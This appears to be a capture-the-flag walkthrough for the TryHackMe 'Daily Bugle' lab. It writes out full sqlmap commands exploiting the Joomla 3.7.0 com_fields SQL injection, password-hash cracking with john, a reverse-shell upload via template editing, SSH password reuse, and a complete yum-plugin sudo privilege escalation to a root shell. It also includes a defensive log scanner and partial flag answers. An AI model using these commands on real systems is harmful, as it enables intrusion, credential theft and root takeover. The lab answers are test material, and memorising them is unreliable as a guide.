TryHackMe Daily Bugle is a challenge to compromise a Joomla CMS account via SQLi, practice cracking hashes and escalate your privileges by taking advantage of yum.

Difficulty: Hard

TryHackMe Daily Bugle


Daily Bugle WriteUp

Access the web server, who robbed the bank?


Scan Target Machine with Nmap

nmap -sV -sC --script=vuln 10.10.155.246

Find Joomla Version

The Joomla version is already in the Nmap output, but it can also be checked manually by fetching two files the CMS ships with:

wget http://10.10.204.53/README.txt
wget http://10.10.204.53/administrator/manifests/files/joomla.xml

Crack Jonah Password

Crack the Hash? but where is the hash?

We have Joomla CMS version 3.7.0, and Nmap tells us there is a public exploit for it, so let's search for it:

searchsploit joomla 3.7.0

Great, we find one that uses SQL injection through a single vulnerable parameter.

Copy the exploit to our home folder and read it:

searchsploit -m 42033.txt
less /root/42033.txt

SQLMap Command

List All Databases

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Select the Joomla Database

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -p list[fullordering] --hex

Read Tables from Joomla Database

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla --tables -p list[fullordering] --hex

We have 72 tables; which one is the users table?

Let's extract the #__users table data, hoping to find Jonah's password hash.

Extract data from the #__users table

sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' -p list[fullordering] --dump --hex
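The sqlmap requests above leave a distinctive trace in the web server's access log. As an added defensive counterpart (not part of the original writeup), this Python script flags com_fields requests whose list[fullordering] value carries SQL functions or quotes instead of a plain column name, and requests for the two version-disclosing files fetched earlier. The log lines are constructed samples and the Apache combined format is assumed.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache "combined" access-log lines (not from the writeup); the second line
# carries the com_fields list[fullordering] payload shape that sqlmap sends.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Nov/2023:10:01:02 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Nov/2023:10:01:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%281%2Cconcat%280x3a%2Cuser%28%29%29%2C1%29 HTTP/1.1" 500 311 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.9 - - [06/Nov/2023:10:01:06 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.title%20ASC HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.7 - - [06/Nov/2023:10:02:00 +0000] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 2048 "-" "Wget/1.21"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# A legitimate Joomla ordering value is "<column> ASC|DESC"; quotes, parentheses or
# SQL function names never belong there.
LEGIT_ORDER_RE = re.compile(r'^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$', re.IGNORECASE)
SQL_MARKER_RE = re.compile(r'\b(updatexml|extractvalue|sleep|benchmark|concat|union|select)\b|[()\'"]', re.IGNORECASE)

# Files that reveal the Joomla version (the writeup fetches both to fingerprint the target).
VERSION_FILES = {'/README.txt', '/administrator/manifests/files/joomla.xml'}

def classify_request(target):
    """Return a reason string for a suspicious request target, or None."""
    url = urlparse(target)
    if url.path in VERSION_FILES:
        return 'version-probe'
    qs = parse_qs(url.query, keep_blank_values=True)   # decodes list%5Bfullordering%5D too
    if qs.get('option') != ['com_fields']:
        return None
    for value in qs.get('list[fullordering]', []):
        if SQL_MARKER_RE.search(value):
            return 'sql-function-in-ordering'
        if not LEGIT_ORDER_RE.match(value):
            return 'unexpected-ordering-value'
    return None

def scan_log(text):
    """Parse access-log text and return one finding dict per suspicious line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify_request(m['target'])
        if reason:
            findings.append({'ip': m['ip'], 'time': m['ts'], 'status': int(m['status']),
                             'reason': reason, 'target': m['target']})
    return findings

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['reason']} HTTP {f['status']} {f['target'][:60]}")
```

A 500 response paired with a flagged ordering value is the error-based probing sqlmap relies on, so alerting on that combination cuts false positives from harmless column names.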

Crack Jonah Password Hash

john --wordlist=/usr/share/wordlists/rockyou.txt jonah_hash.txt
john jonah_hash.txt --show

Login Joomla Administration as Jonah

http://10.10.204.53/administrator
username - jonah
password - the one cracked from the hash

Upload Reverse Shell to Joomla

http://10.10.204.53/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA%3D%3D
pwd

Investigate File System

First, let's investigate the Joomla folder:

cd /var/www/html
ls -la

Great, we have the MySQL root password in the configuration. Let's check whether the MySQL daemon is running as root:

ps aux | grep mysql

No success: the MySQL service is running as the mysql user 🙁

What if the user jjameson reuses the same password as the MySQL root user?

Let's try to open an SSH connection as jjameson:

ssh jjameson@10.10.204.53

Find User Flag


Elevate Privileges from JJameson user to Root

sudo -l

As we can see, the jjameson user can execute the yum command with sudo, so let's find out how to elevate privileges using yum.

cd /tmp
RFS=$(mktemp -d)
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOF
cat >$RFS/y.conf<<EOF
[main]
enabled=1
EOF
cat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $RFS/x --enableplugin=y

Answer the questions below

What is the Joomla version?

3.7.0

*Instead of using SQLMap, why not use a python script!*

What is Jonah’s cracked password?

spider*RFS*

What is the user flag?

27a260fe3cba712cfde*RFS*

What is the root flag?

eec3d53292b1821868*RFS*

GTFOBins

Exploit Joomla 3.7.0

Room name: Daily Bugle
OS: Linux
Difficulty: Hard
Room Link: tryhackme.com/room/dailybugle
Creator: Tryhackme


Last Update: November 6, 2023